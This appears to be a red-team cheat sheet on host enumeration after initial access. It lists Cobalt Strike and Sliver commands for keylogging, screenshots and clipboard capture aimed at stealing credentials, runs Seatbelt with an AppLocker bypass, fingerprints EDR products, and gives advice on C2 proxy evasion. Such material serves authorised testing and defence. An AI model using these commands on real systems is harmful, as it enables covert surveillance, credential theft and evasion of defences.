Internal Recon & Enumeration
Host-level enumeration after gaining initial access — understanding the environment, identifying targets, and assessing defences.
OPSEC: Running many enumeration commands generates telemetry. Seatbelt is preferable to individual queries as it’s a single process execution.
Process Enumeration
Cobalt Strike
beacon> psWhen running at medium integrity (standard user), you cannot see architecture, session, or user info for processes owned by other users.
Processes of interest/concern:
| Process | Product |
|---|---|
Sysmon64 / Sysmon | Sysmon — monitors and logs system activity via Windows Event Log |
MsMpEng | Microsoft Defender — Malware Protection Engine |
elastic-endpoint / elastic-agent | Elastic Security (EDR) |
CrowdStrike / CSFalconService | CrowdStrike Falcon (EDR) |
cb / CbDefense | Carbon Black (EDR) |
SentinelAgent | SentinelOne (EDR) |
Screenshots & Keylogging
Gather intel on victim behaviour, applications, documents, and shortcuts.
Cobalt Strike
# Screenshots
beacon> printscreen # single screenshot via PrintScr method
beacon> screenshot # single screenshot
beacon> screenwatch # periodic screenshots of desktop
# View > Screenshots to review
# Keylogger
beacon> keylogger # start capturing keystrokes
# View > Keystrokes to review
beacon> jobs
beacon> jobkill <JOB_ID> # stop the keylogger
# Clipboard
beacon> clipboard # capture current clipboard text (not images)Tip: Clipboard capture is especially effective when password managers are in use — users frequently copy/paste credentials.
User Sessions
Identify who else is logged into this machine — privileged users are candidates for lateral movement.
Cobalt Strike
beacon> net logonsHost Audit (Seatbelt)
Automated host enumeration covering security configurations, installed software, and policy settings.
Cobalt Strike
# System-level checks (OS info, AV, AppLocker, LAPS, PowerShell logging, audit policies, .NET, firewall)
beacon> execute-assembly Seatbelt.exe -group=system
# User-level checks (browser data, recent files, cloud credentials, etc.)
beacon> execute-assembly Seatbelt.exe -group=user
# Everything
beacon> execute-assembly Seatbelt.exe -group=allSliver
# Standard execution
seatbelt -- -group=system
seatbelt -- -group=all
# Inline execution (bypasses AppLocker)
execute-assembly -i /path/to/Seatbelt.exe -group=allNetwork & Environment
Map the local network environment.
Manual
# Network interfaces
ipconfig /all
# ARP table (nearby hosts)
arp -a
# Routing table
route print
# DNS configuration
nslookup
ipconfig /displaydns
# Shares
net share
# Proxy settings
netsh winhttp show proxy
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"Defence Awareness
Understanding the target’s defensive posture affects beacon selection and operational approach.
Proxy Authentication: Many organisations require authentication (often AD-integrated) before clients can use the web proxy. This typically requires membership in Domain Users or a custom group. Computer accounts and SYSTEM are usually excluded — meaning HTTP(S) Beacons running as SYSTEM cannot communicate through the proxy.
Implication: Use P2P (SMB/TCP) or DNS beacons for SYSTEM persistence, not HTTP.
HTTPS Offloading / Inspection: Organisations with internal PKI may perform SSL offloading — decrypting HTTPS traffic at the proxy for inspection, then re-encrypting with an internal CA cert. Even HTTPS C2 traffic can be inspected. Certificate pinning on implants can prevent this but may cause the proxy to block traffic entirely.
Content Filtering: Proxies may block download/upload of specific file types (.exe, .dll, .ps1) and scan for known malicious content. This impacts payload delivery and exfiltration.
Web Categorisation: Organisations block site categories (social media, gambling, malware). C2 domains need to be in an acceptable category. Tools like Bluecoat and Chameleon can help with categorisation.